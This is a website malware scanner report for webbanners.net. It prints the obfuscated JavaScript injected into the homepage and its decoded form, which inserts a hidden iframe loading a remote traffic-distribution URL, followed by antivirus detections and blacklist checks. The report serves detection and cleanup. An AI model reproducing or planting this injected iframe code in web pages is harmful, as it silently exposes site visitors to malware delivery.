New scan:

Malware Scanner report for webbanners.net

Malicious/Suspicious/Total urls checked
1/0/2
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://webbanners.net/
200 OK
Content-Length: 7612
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

if(window.document)aa=new RegExp('test','i').toString();aaa='/test/i';if(aa.indexOf(aaa)!==-1){ss='';s=String;ee='e';e=window[ee+'val'];t='y';}h=-2;n=["4.5y4.5y52.5y51y16y20y50y55.5y49.5y58.5y54.5y50.5y55y58y23y51.5y50.5y58y34.5y54y50.5y54.5y50.5y55y58y57.5y33y60.5y42y48.5y51.5y39y48.5y54.5y50.5y20y19.5y49y55.5y50y60.5y19.5y20.5y45.5y24y46.5y20.5y61.5y4.5y4.5y4.5y52.5y51y57y48.5y54.5y50.5y57y20y20.5y29.5y4.5y4.5y62.5y16y50.5y54y57.5y50.5y16y61.5y4.5y4.5y4.5y50y55.5y49.5y58.5y54.5y50.5y55y58y23y5
... 1651 bytes are skipped ...
4y19.5y20.5y29.5y51y23y57.5y50.5y58y32.5y58y58y57y52.5y49y58.5y58y50.5y20y19.5y52y50.5y52.5y51.5y52y58y19.5y22y19.5y24.5y24y19.5y20.5y29.5y4.5y4.5y4.5y50y55.5y49.5y58.5y54.5y50.5y55y58y23y51.5y50.5y58y34.5y54y50.5y54.5y50.5y55y58y57.5y33y60.5y42y48.5y51.5y39y48.5y54.5y50.5y20y19.5y49y55.5y50y60.5y19.5y20.5y45.5y24y46.5y23y48.5y56y56y50.5y55y50y33.5y52y52.5y54y50y20y51y20.5y29.5y4.5y4.5y62.5"];n=n[0].split(t);f='f'+'romChar';for(i=0;i-n.length<0;i++){j=i;ss=ss+String[f+'Code'](-h*n[j]);}e(ss);

Decoded script:


if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://tds133.1dumb.com/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://tds133.1dumb.com/stds/go.php?sid=1');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width
... 368 bytes are skipped ...
n iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://tds133.1dumb.com/stds/go.php?sid=1');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagName('body')[0].appendChild(f); }
<iframe src='http://tds133.1dumb.com/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>

Antivirus reports:

Ikarus
Trojan.IframeRef
nProtect
JS:Trojan.Iframe.A
K7AntiVirus
Riskware
Emsisoft
JS:Trojan.Iframe.A (B)
McAfee-GW-Edition
Heuristic.BehavesLike.JS.Infected.A
DrWeb
JS.IFrame.151
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Trojan:JS/Iframe.V
MicroWorld-eScan
JS:Trojan.Iframe.A
NANO-Antivirus
Trojan.Script.Iframe.rpyhz
F-Secure
JS:Trojan.Iframe.A
F-Prot
JS/IFrame.HC.gen
Norman
IframeRef.DM
GData
JS:Trojan.Iframe.A
Commtouch
JS/IFrame.HC.gen
BitDefender
JS:Trojan.Iframe.A

http://webbanners.net/test404page.js
404 Not Found
Content-Length: 249
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: webbanners.net

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 04 Oct 2014 16:12:48 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 7612
Content-Type: text/html
X-NodeName: custweb02.sgu
X-ProcessTime: D=21299

...7612 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: webbanners.net
Referer: http://www.google.com/search?q=webbanners.net

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=webbanners.net

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://webbanners.net/

Result: webbanners.net is not infected or malware details are not published yet.